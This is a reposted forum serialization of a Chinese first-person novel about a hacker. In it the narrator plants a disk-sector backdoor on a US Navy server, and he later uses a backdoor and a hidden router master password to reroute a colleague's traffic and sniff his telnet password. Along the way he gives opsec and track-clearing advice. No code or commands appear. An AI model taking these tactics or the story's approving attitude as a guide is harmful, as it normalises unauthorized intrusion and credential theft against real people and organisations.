    我没有其他的嗜好，看到电视上为了表现一个人很艰苦的工作，都是通过疯狂抽烟等来表现的。我不抽烟，不喝酒，除了少量的啤酒和葡萄酒。每当我取得实质性的突破之后，我就想唱歌，在学校的时候我还是个出名的校园吉他歌手。那把吉他还是原来的那把，弦已经换过很多次了，琴面也斑驳不堪。但是音色还是原来的那样，没有改变。轻轻的抚着它，就像抚着的我的青春。我唱歌不需要听众，我是用自己的心再唱。当初小敏就是被我的歌声打动。她说，我的歌虽然是别人写的，但是感觉是在唱你自己。有时候我会把自己唱的东西录下来，不想唱的时候，就自己听。其实我是一个满感性的人。谁说黑客不是多愁善感？
    放下琴的时候，已经4点钟了，我的思维依然清晰，一点睡意都没有。长期的熬夜，让我现在一到晚上就亢奋，白天上班精神就不好。从我们头的眼神中，我能想象的到他可能怀疑我有什么不对，说不定怀疑我吸毒都有可能。呵呵。
    剩下的工作就比较好办了，安装后门，清除痕迹。这是黑客的基本功。这些对我来说，基本不需要思维。因为对unix系统的后门安装我都是使用我特有的方式，因此现在还没有被发现过。而且，我一旦攻克了一个计算机之后，一般不会对它的系统作任何的改变。也就是有可能1年都不会再次登陆这个server，被发现的机会几乎等于0，除非它重装系统。不过，一个专业server，不是说重装就重装的那么简单，所以这个问题基本不用担心。仔细分析了一下这个系统，发现他们的管理员确实比较厉害，到处都是陷阱和监控。比如，他的bin目录下的系统程序全是被作个记号的，只要你动这些程序，立刻就可以发现。一般的黑客安装后门都是替换这些文件的。所以想通过改他的文件的方式，你迟早会被发现。至于那种给自己建个root权利帐号的菜鸟做法，无异于送死。
    但是，这些对我都没有用。因为，我根本就不会使用文件的方式安装后门。我使用的是直接写磁盘扇区的方法安装我的代码。通过系统的启动代码激活。这和引导型病毒的原理一样。由于我没有动任何文件，所以通过监控文件系统根本不可能发现我。我用汇编写的一个很小的一个连接程序。相当于一个telnet服务程序，使用二进制方式保存在磁盘上。功能非常单一，就是一个执行系统命令功能，对我来说，这就足够了，越小隐蔽性越好。
    很快就安装好了，但是要激活必须要等到系统重启动才行。这些专业server一年不重启都是非常正常的。所以，为了验证和现在就激活它，我马上写了一段程序，把它激活在内存中。使用我特制的客户端，验证一下，ok，成功。
    打扫痕迹，退出。我把所有的记录文件把我的有关信息，全部删除。但是我知道，这些对高手来说，还是会看到痕迹的,他们的文件监控系统可不是吃干饭的。只要我动了文件，肯定就会发觉。但是没关系，至少他们不知道是谁动的，他们只可能查处是哪个帐号，但是无法追查到我的ip，这就够了。那些所谓的打扫痕迹的一点不留的文章都是骗人的，这是不可能的，除非对方是菜鸟。不过，没关系，我已经退出，没有任何破坏的迹象，估计他们的管理员虽然会怀疑，最多改变密码，但是现在我已经不需要他们的密码了。我有自己的入口。
    很多人，进入别人的server之后，就不可一世，生怕世界不知道，什么还给人家系统安个sniffer之类的东西，还想借助人家的机器搞到更多的密码。哈哈，我要说，这是典型的菜鸟的做法。你真以为人家的管理员是吃干饭的？你真以为你天下第一？稍稍好点的网站，哪个管理员不比网上那些写黑客教程的家伙经验丰富？那些管理员都是黑别人的网站磨练出来的，你这些幼稚的招数，人家看不出来，那他真的该下课了。那些教程大部分都是路人都知的过时的招数。别以为人家的管理员都是傻子，其实他们相当厉害。黑客就像一个敌后的特种兵，你一暴露，就死定。别听什么孤单英雄什么的，那是吹牛的！你留下的东西越少越好。越少就越不容易暴露。而且没事，尽量不返回这个网站，进去都以普通人身份进去。我有个习惯，我一旦攻克了某个server，一般我退出之后，我1个月内一般不会再去第二次。甚至半年1年都不会去第二次。事实证明这是绝对正确的。我还没被发现过。当然我上学的时候还是菜鸟的阶段，被人家抓住那是不算的。呵呵。
    你想啊，那些管理员个个都是厉害的角色。他们很快就会发现什么不对。因此，在最近一周，甚至一个月都会全力监控，试图找到怎么回事。这个时候，你再次登陆，你不是找死是什么？你厉害，你再厉害，你能厉害过人家就坐在server面前操作，想有什么权利就有什么权利的管理员？你会写程序？人家把编译器给你删除了你编译个球呀？所以，强龙你也斗不过地头蛇。所以最好的方法我就是不来，你监控，什么都没有。我看你能监控多久。人就这个毛病，任何人都不例外，时间一长，没有动静，就松懈了。我也是一个server的管理员，我一样有这个毛病。当我发现有不对，我立刻会几周甚至一个月权利监控。但是时间一长，我看到没什么事情，也就松懈了。是人都有这个毛病。
    其实，一个高手，你和他说话就知道了。我常在网上逛，现在的牛人多的很。那天到一个语音聊天网站去解闷。刚进入一个房间才3分钟不到。一个牛人冲进来，抢了mic，牛气冲天的说：“房间里的人，听着，你们立刻给我出去，否则我立刻踢你们出去。而且封掉你们的ip，让你们永远无法上网，快点！”。
    呵呵，你别说，还真有乖乖退出的。我从他的位置可以看出，他不是房主，所以我不怕。没理他。就是房主，他也封不掉我的ip。
    我没理他，房间里面就剩下我们两个人了，那个牛人继续叫骂，继续威胁要封我的ip。我实在是烦了，给他打了字：“滚！菜鸟！”
    哈哈，他个家伙可能没想到会遇到比他还牛的，真的就走了。当时我就笑了。
    真正的高手，他绝对不会给你说技术问题。除非遇到了同道中人，而且确实有必要的时候。我在网上一般不会和别人谈论黑客问题。甚至连计算机都懒得谈，我在网上就把自己伪装成一个歌手，我更喜欢唱歌，听歌，闲聊。生活毕竟是多面的，不是吗？
    退出了server，我开始看看一些休闲网站。那个目标成为我的历史。可能很多人就说了，就这么完了？对，就这么完了，我已经取得了他的控制权利，还要怎么样？不对呀，这是美国海军网站，怎么不搞点什么情报，什么航空母舰的设计图，或者导弹的设计图，或者伊拉克战争密文什么的？这对你不是很容易吗？
    哈哈哈，要不我怎么会骂那些导演都是TMD的sb呢？问题就在这里。大家受那帮人的毒害太深了，要不怎么说谎话说一千次就变成了真理的呢？前人的总结真是精辟呀！拜托，这是美军对外公开的网站。都是写可以发布的内容。真正放军事资料的东西怎么可能对外公开呢？你说，我们国家的机密资料会不会放到北京图书馆？即使有严格规定不准任何人借阅的。但是你说可能放到北京图书馆这个大家都可以来的地方？显然不可能的。同样，你说信息化水平最高的美军可能把自己的网络和民用网络连接起来吗？那些使用民用网络进入人家军事要地的事情都是扯淡！怎么可能，人家线路都没有给你连接，你本事再高，能进入吗？ 大 家是不是以为美国没有黑客，或者美国军队中不知道黑客可以作什么事情？晕，他们是黑客的老祖宗，好不好？他们不会傻到他们的机密数据库给你放到internet上，只要有帐号就可以访问的地步吧？
    黑客不是神，就是普通人。常看到一些人说黑客进入某某银行怎么怎么样等。这些都是扯淡，除非是内部人员，而且是计算机管理员，否则更本就不可能什么改什么帐号呀，给里面转多少钱呀，等等。我当黑客就是兴趣。我每天还是要上班吃饭，我仍然想如何发财。我一样羡慕人家有钱有势。你看过有人*黑客技术过的滋润的？没有。最好的就是去当安全人员和网络管理员。
    退出了美国海军server，我决定至少一个月不再访问它了。现在已经5点钟了，必须要睡觉了，尽管我还比较亢奋。冲冲脚，躺倒我的单人床上，一会儿就进入梦乡。熬夜就是这点好，决不担心没瞌睡。躺到床上不超过10分钟，立刻睡的和死猪一个样。
    依稀的梦中。。。。我好像看到小敏在对我甜甜的笑。
    如果你到我们单位随便去找个人问：你们单位计算机最牛的是谁？多半你会得到的答案是：是网络部的人。
    如果你继续问，除了他们是谁？多半的答案是：财务部的吧。晕。
    如果你再问，除了他们呢？可能得到的答案是：应该是软件开发部吧？
    从这里你可以看出，我们软件开发部在单位其他人的心中连财务部那帮菜鸟都不如。
    在我们单位的人包括领导心中，网络部那帮人是厉害的，因为他们整天作的主页都在我们网络上随处可见。大家整天都在和他们打交道。大家都觉得他们使用asp搞的页面真是漂亮。于是，网络部那帮家伙真的就以为他们很牛，尾巴就有点翘了！然后是财务部那帮家伙，他们搞了个工资查询系统，每个人每个月都要使用他们那个东西。因此他们的名声也很好。
    唯独我们软件部，开发的东西，最费脑筋，但是开发的东西一般本单位都是少数人使用。所以，没有人知道我们到底做了什么，也没有人知道我们到底有什么本事。再加上，我们部的家伙们个个都去啃c＋＋，去啃java那些东西去了，所以对一般的修改注册表呀，网络使用技巧呀，反而就忽略了。不是这些哥们不懂，而是，大家觉得太简单，都记不住，需要再到网上去查，不需要就记不住。
    每次其他部门的人遇到计算机问题的时候，开始还是找我们软件开发部的人，结果这些哥们大部分都是一句话：简单，到网上去找个东东修正一下就ok了。结果，为了找那个东东，最后花了1个小时。最后终于解决了，但是还是不如网络部和财务部那帮小子来了，不到10分钟就搞定。他们整天就是搞这些东西，所以都比较熟悉，都记到脑子里面了。
    我们的人，每次都抱怨他们为什么不问，api函数如何拦截，vxd如何写的问题呢？倒。呵呵哈。
    多几次之后，我们软件部的人的声誉在其他部门心中就低了下来，以后出了问题，几乎就是网络部和财务部那帮小子了。
    其实，这些我们也不在意。本来我们也不想在这些问题上浪费时间。而且，大家都有自己的强项，他们会搞搞网页，搞搞注册表，也是好事情。没什么可说的。但是，网络部里面就是有几个小子，总是和我们叫板，给我们小鞋穿。这下，我们的人就有意见了，老虎不发威，你还真以为我们是病猫？你们真以为我们不如你们？哼！
    软件部在整个单位网络的占用量可能是最大的。大家经常都是边写程序，边down东西。于公的有，于私的也有。而且down的东西都是很大大的东西，比如visual studio 7CD呀，比如，MSDN 2cd呀，比如delphi啦，等等。反正全是大的。我们部唯一的MM也不例外。她主要是作文档的，写程序相对要差些。但是她down的东西一点也不比我们少。比如流星花园2了，比如什么蓝色生死恋呀，等等。
    大家都都在忙自己的事情。头儿在自己的小办公室里面也没什么动静。估计也在忙自己的事情。大家都在顾自己的。我也正在down RedHat 9.0，3 CD。同时一边听着树木年华的那首《中学时代》，纯纯的感觉，真不错。我就喜欢这种纯纯的音乐。旁边哥们又在用重庆话唱那个周杰伦的什么《双截棍》，每次都会让我有跳搂的感觉，我就大喊：再唱？再唱，再唱老子用紫光烫死你！
    嘿嘿哈哈！哥们唱完最后几个字，缩到他桌子上去了。其他哥们就笑。我们部的MM就对我翻白眼。
    用紫光烫死你，这句话在我们这里是有典故的。
    我们部，每个人都配了个笔记本电脑，主要是大家开发程序带起来方便。我们的设备都是设备科统一买的。那帮菜鸟不知是因为爱国，还是因为便宜，就统一买的紫光。紫光最大的毛病就是发热量大。当时我们部那个MM刚来不久，又是夏天，开了一上午的机器都是放到桌子上的。吃饭的时候也没有关，吃饭回来，大家聚在一起吹牛。MM可能想一边听我们说话，一边敲些文档吧，反正她就把那个紫光拿过来，拿过来直接就放她大腿上了。只听，“啊”一声惨叫，MM就跳起来了，紫光就摔地上了。你想呀，夏天，人家MM就穿了一个丝袜，一个裙子，当时笔记本就放她丝袜上了。不知道紫光确实太烫，还是我们那位MM特别敏感。反正当时她就跳起来。吓我们几个哥们一跳，大家都不知道怎么回事，只听MM一边摸她的腿，一边说烫。大家才明白过来。当时，几个哥们笑的不行。帮MM捡起紫光，还好，还没率坏。从此，紫光在我们这里出名了。用紫光烫死你，也成了我们这里最有创意的威胁人的方法。每次用，大家都笑。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:52　　 标题: [转帖]我是一个黑客 [经典长篇小说]

“咦，网络又不通了！”我们那位MM喊道。我们那位MM叫李媛媛，长得蛮漂亮的。其他哥们都对她垂涎三尺子。不过好像我们的李MM都是白眼伺候。
    “真的呀，***网络部！”顿时抱怨声开始此起彼伏。
    我一看，真是的，flashget的窗口已经没有绿色速度线了。头儿，也从办公室出来了，问：“网络是不是不通了？”
    看到大家的抱怨，头儿马上回去了。我们看到，他正在拨电话。好一会儿，他出来了：“网络部说连接我们科室的交换机有故障，都怪我们的数据量太大了。他们会尽快修好。”
    这已经是这周第4次了，基本每天都会来这么一下子。大家都恨的牙痒痒。
    “*，不会交换机天天都在出故障吧？”
    “真以为我们不懂呀，哪里有数据量大，交换机就会出故障的？”
    “是呀，最多就是速度慢嘛？哪里会断掉？”
    大家开始七嘴八舌。
    我知道大家说的都是正确的。交换机怎么可能这么容易出问题。即使出来问题，换了之后也不会这么容易就又出问题吧。我用我写的程序和网关建立连接，发现连接建立成功。但是马上就被断掉，这个时间很快。换作其它程序，你是看不出来的，和网络不通效果是一样的。我立刻明白了，确实是网络部有人在搞鬼。明显是在我们部门的网关上动了手脚。还说是交换机出故障。真是欺负我们没有玩过网络吗？我分析了一下原因，可以确定是在连接我们部的那个路由器口子上作了过滤或者规则限定。明显的人为故障。
    到了该教训他们的时候了，否则他们老这么搞，搞的上班都心情不好。我最烦的就是下东西下到一半的时候，网络就断掉。
    其实，对我们单位的网络，我早就搞的很熟悉了，所有我有100％的把握。我们单位用的是华为的路由器，R262X系列的。呵呵，网络部那些人还不知道，早在几个月前我就已经把华为路由器的操作系统反编译分析了。其实路由器的操作系统比较简单，比起linux来说要简单得多。所以，当时，我们单位刚买回来这个路由器的时候，设备科的一个哥们让我去帮他们验收，我借机会借了一台到家里面，当天晚上，我就把它搞到一个哥们那里，那位哥们是我们这里一个著名大学电子工程系的助教。把路由器搞到他们实验室，使用那个逻辑分析仪器，再借助rom读写器，基本把它的操作系统的一些主要东西搞到我的磁盘上了。尽管这些东西不是一个完整的操作系统，但是路由器的关键地方的代码应该是差不多了。
    搞回家后，我没事情的时候就读上一段。很快我就有了惊人的发现。原来华为路由器存在着特权口令的万能口令！也就是说，如果你要进入特权方式，必须要输入正确的口令。否则，无法进入。象计算机的bios一样，可能为了他们工程师的维修方便，他们居然留了一个万能口令。我才彻底明白，为什么它的使用手册上说：万一你将口令遗忘，请联系华为经销商。看来，他们的工程师是知道这个口令的。而且每个路由器的万能口令都不是一样的。否则的话，一旦泄漏，那华为的路由器就别想卖了。即使有些万能口令泄漏出去，也没什么，你晓得那台路由器在中国的哪个角落工作呢？
    这一惊人发现，着实让我兴奋了好久。这次我的运气好像不坏。因为，我破译了万能口令的那台路由器恰好被安装成整个单位的总出口路由器。哈哈，你想想，我以前说过我有个c类地址可以随便换。哈哈，都是因为这台路由器的功劳。
    现在我只需要进入这个路由器，如此这般这般，我看你们网络部这帮家伙还给不给我们小鞋穿！？
    想到这里，我脸上溢出了报复的冷笑。。。。。。
    尽管我有100%的把握，但是想获得连接我们部的路由器的控制权力还是要费点事的。而且必须做得神不知鬼不觉的。毕竟都是自己人，人民内部矛盾，大家开开玩笑也就行了。公开了就不好了。其实网络部那帮哥们和我的关系也不错。平时常在一起探讨一些网络问题。他们见过的东西多，所以我经常问他们一些问题。但是他们那个头儿，姓胡，长得和《渡江侦察记》里面那个狡猾的参谋差不多，瘦瘦的，戴个眼镜。和我们头儿经常在中层干部会上对着干。由于我们头儿是博士，那个胡队长（我们软件部的人都这么叫他）什么也不是，而且是学化学的，因为业余爱好计算机，玩计算机也不错，也就成了其它部门心中的高手。由于当时用flash作了一个我们单位的宣传材料，深得上层人士的欢心。当时，还没有软件部，单位建设网络部的时候，没有其他的人选，于是这位“高手”就坐上了网络部主任的宝座。当然这些我也是听其他元老级人物说的。我也是后来才来的。
    当然我们头儿是后来才来的，否则，不可能能轮得上他。每次当胡队长在会上展示他们搞的网站，并且不可一世的时候，我们头儿总是会用若干无法辩驳的道理把他们的东西驳得体无完肤。每次胡队长都下不来台。你想，中国官场的斗争很微妙，大家应该心里有数。所以，他恨上我们头儿，并且连我们软件部的人都一起恨上，这是再好理解不过的事情了。以他的理论水平，想和我们头儿搞文斗显然是没戏了。胡队长是和我们的网络建设一起成长起来的，虽然其它方面他不行，但是他在网络方面配置的熟练程度，这不是吹的。在路由器或者防火墙方面搞点小手脚。还不是小菜一碟？根本不需要其他人代劳。
    我问过网络部的哥们，他们说路由器的密码只有他们头儿才有，路由器都是他们头儿配置的。看来，胡队长肯定和我们玩阴的了。其实，这些我们头儿，我想肯定知道。博士的思想水平绝对就是比你一般人高，不服不行。我们头儿的主攻方向是网络加密。对加密算法的研究不服不行。我请教过他很多加密算法方面的问题。真是厉害呀，一针见血，让我明白了不少。比有些狗屁书上说的好得多。说实话，有些书的作者我怀疑他自己都没有搞懂，就抄上去了。
    但是我们头儿就是不说。就是不停地打电话给网络部催，或者打电话给头儿的头儿。
    但是现在我的机器无法上网，招数再多，也没有用处。到隔壁财务处去吧，容易暴露。那帮家伙虽然对编程不懂，但是应该看得出来你在做什么东西。而且，做黑客这个东西，还是自己的机器用起来顺手。
    管他的，先想办法上网再说。财务部和我们软件部连接的是同一个交换机。这个交换机再连接到同一个路由器上。他们网络工作正常。说明凡是软件部的ip肯定都被过滤掉了。网络部的机器都是通过一个交换机直接连接到总出口路由器上的。因为胡队长对全单位的机器都作了ip和网卡绑定，所以ip没办法改的，否则，改个财务部的ip就可以上网了。
    ping了ping财务部的计算机。不出所料，果然是通的。显然不是交换机的问题。要上网，只好在财务部中找台计算机帮我一下了。呵呵，当然是那台财务部的信息发布server了。速度块，量又足。呵呵。
    不用破密码，因为在他们安装补丁之前，我已经安了后门了。不过我什么都没做，就留个后门。从没有用过，我觉得没什么意思。但是现在必须要用一下了。
大家可能会说，你们这个财务处也太菜了吧，你们的金融安全如何保证呀？呵呵，他们菜是肯定的。但是，这个server里面没有我们部门的财务数据库。他们的数据库在另外一台单独的计算机上，没有接入网络的，从软件到硬件都是上级部门统一配发的。这台server就是发布信息的，具体的说就是搞工资查询的，每个月的工资数据都是使用access数据库copy上去的，所以，没什么价值。即使你攻入了，对财务也没什么影响。
非常轻松的进入那台server。先看看安装路由和远程访问没有？一看，没有！看来要安装一个代理服务器了。传了个proxy＋上去，这个东西小而功能也强。一切顺利，很快我的机器就可以上网了。由于大家都是内部网，100M的规格，所以速度和直接上网没什么区别。
    首先必须获得我们这个路由器的口令。然后就一切ok了。
    本来想直接攻击胡队长的计算机。胡队长的的ip大家都晓得的。但是我扫了胡队长的计算机，他的2000专业版本该加的补丁都加了。而且没有开server。所以搞起来非常麻烦。需要时间。但是现在我没有时间，必须要速战速决。而且，他肯定安了防火墙的。说不定就会发现财务处的server在扫描他。所以，我必须要快快。毕竟，胡队长在网络配置和防护的水平绝对在网上算“高手”级别的。不可轻敌。
    首先在财务处server上安装了个软件路由器。然后进入我们的总路由器，在路由表中加了一条规则，把胡队长的计算机的数据全部转发到财务处的软件路由器上，然后通过财务处的路由器再转向那个出口路由器。接着在财务处的路由器上安装了我自己写的包过滤软件。这样，胡队长对外的数据包都会被我记录下来，他登陆路由器一般用的就是telnet，这个是不加密的。呵呵，你的密码还能跑的掉？
    为了节约时间，必须让胡队长快点送密码，于是我拨了胡队长的电话。
    “喂，胡主任吗？我软件部。刚才我们的网络通了3分钟，但是现在又不通了，麻烦你们检查一下好吗？”
    放下电话，我就开动了我的包过滤软件。果然，很快，胡队长的ip数据包就开始源源不断的过来了。
    呵呵，我差点笑出来。你想，明明是他刚才过滤掉我们的，但是我偏偏说我们通了3分钟，这根本不可能的。他对自己的设置还不清楚吗？所以肯定会重新登陆路由器，检查设置。当然，肯定设置绝对没有任何问题。一会儿，他可能就会有所察觉。呵呵。
    果然，一会儿，他的数据包就没有了。我立刻以最快的速度down下记录文件。并恢复了出口路由器上的设置，然后删除掉财务处server上我安装的所有东西。然后断掉连接。开始在我的机器上分析我拦截下来的数据包。因为我自己对telnet的数据包做过试验分析。所以密码的位置在杂乱的数据包中很快就被分析出来了。*！密码居然是~i*hate&doctor%zhang。哈哈，doctor zhang就是我们头儿啦。看来这家伙果然是恨上了我们头儿了，连密码都不忘记提醒。不过这个家伙的密码如果破译起来是有点难度的。
    好了，立刻进入那个路由器，打开防火墙的设置规则一看。果然，这个混蛋把我们软件部的地址的数据包全部drop掉了。我删除掉后，立刻退出，网络立刻就通了。随着李MM一声欢呼：“通了，网络通了”，我们的flashget都开始出现绿色线了。大家欢呼了几声，又开始做自己的事情了。
    我在想，要不要把特权口令改了，让胡队长去找经销商。后来想想，不好。玩笑开的大了点。就放弃了。
    过了一会儿，胡队长过来了。我们和他打着哈哈，大家都说以后不会断了吧？胡队长不自然的笑着。眼睛却不停地挨个看我们的屏幕。看来这个家伙肯定发现有人改了路由器，看来是来侦察来了。我心里暗暗好笑。但是表面不动声色，在编我的java程序。
    胡队长转了一圈后，没什么收获。出去了。
    我估计以他的知识深度，是不可能能想得通人家是如何进入路由器的。至于破译万能口令，他也是无法理解的。我想他唯一的解释可能就是他的口令被别人猜出来。果然，他走后，我重新试图进入路由器，失败了。显然，他的口令已经改变了。胡队长不是傻子。一般网络管理员的素质绝对是有的。
    “shit！”我心里想，以后他又重新改设置怎么办，得想办法获得他的路由器口令，才行。
    怎么一劳永逸地获得他的口令呢，我正想着。听见头儿叫我：“小王，进来一下”
    我心里一惊，难道胡队长知道是我干的，告发我了？
    我忐忑不安地进入头儿的办公室。
     进入头儿办公室，发现他正在桌上写着自己的东西，好像是论文。
    我的心放了下来，一般头儿要批评我，一般都会盯住我的。现在他居然连头都没抬。
    “刚才总部那边打电话来，叫我们派一个解密高手过去，我现在没时间，你替我去吧”
    “做什么呀，我可不是干解密的，这不是你的老本行吗？我的程序还没完呢？”我还要搞胡队长的路由器呢，我想推脱。
    “没关系，工作量照算，手头的工作放下，这可是部长亲自要的人。”头儿，抬头笑着看了我一眼，继续说：“估计也都是些鸡毛蒜皮的事情，大概是机器被病毒感染之类，你去玩玩吧。”
    天，部长亲自要的人，这下可不敢推了。我们头儿确实是一个搞实事的人，连部长亲自点名，都不想去表现一下，把我顶上了。我心想，这些事情不是都是网络部那些人的事情吗，怎么总部叫上我们软件部的人了？
    总部的办公搂修的就是***气派，进去的感觉像进了星级宾馆。我直接到指定的办公室。看见胡队长居然也在，还有财务部一个计算机比较牛的家伙。除了部长外，部长对面居然还坐着一个警察，确切的说是一个非常年轻，估计22上下的女警察。那身警服，让我感到很困惑，我们单位谁犯事儿了？
    “是软件部的吗？张博士怎么没来？”部长说话了。
    “我是张主任叫我来替他的，他有事，来不了。”我赶紧向部长解释。
    部长没说什么 ，开始招呼我坐下，然后接着说话了：
    “这次叫大家来，主要是我们的友好单位需要我们的帮助，这位是市刑警大队的小林警官，他们一个案子涉及到计算机方面的问题，需要大家帮助。在座的各位都是相关部门的计算机优秀人才，再说协助警察，打击犯罪，也是每个公民应尽的义务，所以请在座的各位尽力协助林警官把事情办好。。。下面请林警官和你们具体谈。”。做官的人说话都这味道，我知道怎么回事，心里立刻松弛下来。呵呵，看怎么回事。没想到今天还和警察接触，而且还是个案件。呵呵，好玩。
    部长和那位林警官打了几个哈哈后，离开了办公室。现在屋里就我们四个人了。
    我坐在小林警官斜对面，部长走了，呵呵，没压力了。我开始打量她。哇，现在女警察的新制服还真的好看。挺精神的。而且这位林MM，怎么形容呢，应该说很“俊俏”。圆圆的脸，大大的眼睛，白皙的皮肤，短发，就是通常我们说的“乖乖”型的。而且两个小小的酒窝也满可爱的。
    部长走了，就剩下三个大老爷们，都等她说话，小林有点不自然了。看的出来，她应该也是刚干这个不久吧。她过了一会儿，硬着头皮开始给我们介绍情况。
    原来是他们有个案件中，有个嫌疑犯始终不肯交代。而他们没有其他的证据，只有一份被加过密的计算机文件。警方怀疑这位文件里面都是证据。所以想解开，但是这个文件是被一个不知从哪里down的不出名的软件加密的。网上无法找到解密程序。他们的人努力了很久，也没有办法解开。所以只好请我们部的人帮忙了。因为我们部的计算机应用水平在这里是出了名的，虽然我知道这都是“宣传”的结果，说白了就是“吹牛”的结果。但是他们反正是动用组织关系，找上门来了。
    我一句话都没说。偶尔看看林MM，再看看胡队长。这轮不到我说话。我也不想说话。呵呵。
    “会不会是word文件加了密码？如果是的话，我能解开。” 胡队长终于说话了。
    我差点笑出来，*，如果是word，用得着刑警队这么兴师动众？人家不是说了吗，是一个国外down的不出名的程序加的密。
    “不是，是一个国外下载的叫filelock的程序加的密。”林mm看来还是行家。从她的眼里，我看到了一丝失望。大概她没想到我们这位计算机高手会问出这么外行的话。
    “可以到网上搜索一下，一般都会有解密程序。”胡队长继续说。
    “但是我们没找到。”她停了一下，补充到：“这个软件非常不出名，所以我们没有办法联系到作者，而且网上一般很少人使用这个软件，所以，对它的破密程序应该没有吧。”
    我以想像，他们刑警队已经经过了不少的苦战了。
    “我们曾经对这个程序进行逆向工程，但是这个程序好像加过密，我们没办法读懂它的程序，跟踪也失败了。”林MM现在好像比较自信了，大概看出我们的胡队长没什么了不起的吧。
    财务处那个哥们一句话也没有说，我估计他听懂没有都难说，他是真不敢说话。呵呵，我是不想说话，我想看看胡队长到底有几把刷子。呵呵。
    胡队长也看出来了，这位林警官不是外行。说不定就是他们警队的计算机高手。谁也不比谁傻多少。对内行，*说空话是没什么用途了。他对网络配置再熟悉，但是对加密解密我敢说他是个外行。因为加密解密技术，一般不通过系统的学习是很难掌握的。胡队长一个搞化学的半路出家，整天都搞网络配置去了，哪有时间去研究这些。所以说他是外行绝对不过分。至于财务处的那位哥们，这可和注册表没什么关系。所以，我怀疑他压根就没有听懂。呵呵。
    “那就没办法了，谁知道他用了什么鬼办法加的密？藏东西容易，找东西难啦。”胡队长开始要打退堂鼓了。
    “是呀。”林MM敷衍的笑笑。有些失望了。然后例行公事地说：“其他两位同志有没有好方法？”她的目光扫着我们。
    财务处那位哥们尴尬的笑笑“没办法，这个确实困难。”
    林MM把目光停在我的脸上，询问的望着我。手里已经开始收拾笔记本，看来准备走了。
    “你们能提供那个filelock软件吗？”我开口了。
    我看到林MM的眼睛一亮，不迭的回答“能能，当然能。我们有这个软件，就是分析不出来。你可以帮我们分析吗？”
    “呵呵，我也不是很懂，比你们刑警队的高手差远了。不过，可以帮你们看一看，瞎猫碰着死耗子的事情，也难说。哈哈。”胡队长在这里，话不能说的太满，否则，我们的网络日子不好过，等我拿到你路由器密码的时候，呵呵，我才不怕你呢。
    林MM脸上露出了笑容。其实她也是年轻人。只不过工作关系，故意搞的比较严肃。现在，我这么一说，她也松弛下来。
    “对对，让我们小王碰碰，说不定能碰出来。”胡队长故意把碰字说的很重。
    我呵呵的傻笑着。
    大家都哈哈笑着，走出办公室。
    我看到胡队长脸上的一丝不悦，尽管他在笑。我想，我们部的网络肯定又要出问题了。搞他的密码必须赶快呀。
    我慢腾腾的走出总部的大楼。正在考虑如何搞胡队长的密码。
    刚出大门，听见有人喊：“唉～～”
    我一看，一辆白色桑塔纳警车，里面一个女警察对我大叫。不就是刚才那个小林警官吗。
    “叫我吗？我不姓唉，我姓王。”我走过去，“你还没走？”
    “呵呵，我知道。这不是等你吗？你到哪里，我送你吧。”林MM有点腼腆的笑。
    “我就住城北，不远，3站路。”我大方的拉开车门，坐在前面，她的旁边。“走吧。”
    警车开动了。这辈子桑塔纳坐的多了，但是戴警灯的还真是头一回。感觉真是有点怪怪的。车子开动了。
    “你帮我们破译那个程序，你需要些什么条件和工具。我们可以尽量提供。”原来她还是没有忘记她的工作。
    “你是学什么专业的？不会是刑侦吧？”我问。
     她一愣，然后说：“你猜呢？”
    “我觉得你绝对是学计算机的。”
    “为什么？”
    “不为什么，就是觉得是。你说对不对吧？”这个倒不是乱说的。学计算机的人遇到一起，几句话可能就能感觉出来。真的。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:53　　 标题: [转帖]我是一个黑客 [经典长篇小说]

她笑了，没有说话。我想我是猜对了。
    她现在说话随便多了。“你能不能破译这个程序？”两个搞计算机的人说话，不需要再说废话了。
    “你跟踪过那个程序，感觉如何？”
    “有点难，他做过加密，还有反动态跟踪。我跟了几个星期，实在跟不下去了。”
    “看到他的密码算法了吗？”
    “唉，就是没有呀。”
    “其实，动态反跟踪这些，倒是还好办。就怕最后跟出来，加密算法用的是什么世界上的通用算法。这就麻烦了。能不能破译，基本就是看运气了。”大概看我说的东西确实是比较内行，现在她完全相信我了。而且开始把希望寄托在我身上了。
    “一定要帮帮忙，这个案件对我们比较重要的。”
    “这个需要时间呀，我慢慢试试看吧。”
    很快就到我宿舍门前了，我下车。
    “很高兴认识你，我叫林紫嫣。你叫什么，能给个email或者QQ什么的？我把程序发给你？”
    我告诉了她的我的名字还有我的电话，以及email和QQ。客套地说：“要不上去坐坐？”
    “下次吧，bye。”她的车已经开动了。
    晚上上网的时候，发现QQ上已经有人请求加为好友了。呵呵，一看，网名叫若烟。可能是林警官吧。同意加为好友之后，一问，果然是她。
    她迫不及待地把那个filelock程序给发过来。
    我收了。程序很小，100k不到，只有一个简单的窗口界面。我一边和她聊着天，一边调出softice开始跟踪。呵呵，其它不敢说，但是跟踪程序，解密加密还真是我的强项。
    其实我们国家加密解密的黄金时代应该是使用dos操作系统的时候。那个时候，可以说加密解密就是高手的代名词呀。 那个时代，无数的高手投入到这个加密解密的战场上来。那个时候无论加密还是解密，想出来的办法那才真是叫绝呀。现在windows下，程序大了，跟踪程序愈发困难了，还有防盗版的思想从技术层次发展到了法律层次，所以加密解密就弱化了。加上网络的流行，高手们几乎都把注意力转向了网络程序的攻击了。
    我的加密解密功底就是那个时代练就的。当时解密kv300的钥匙盘，就是我的入门课程，debug就是我的最爱呀。后来硕士毕业论文，我的课题就是加密解密技术探讨。当时提出的一个万能解密技术在国内也是首创呀。我的导师都佩服的不行。
    但是，跟踪程序仍然是非常艰苦的。你不要相信有些人吹牛，说自己一晚上就把一个几百k的程序读懂了。还破解了。绝对是吹牛的。
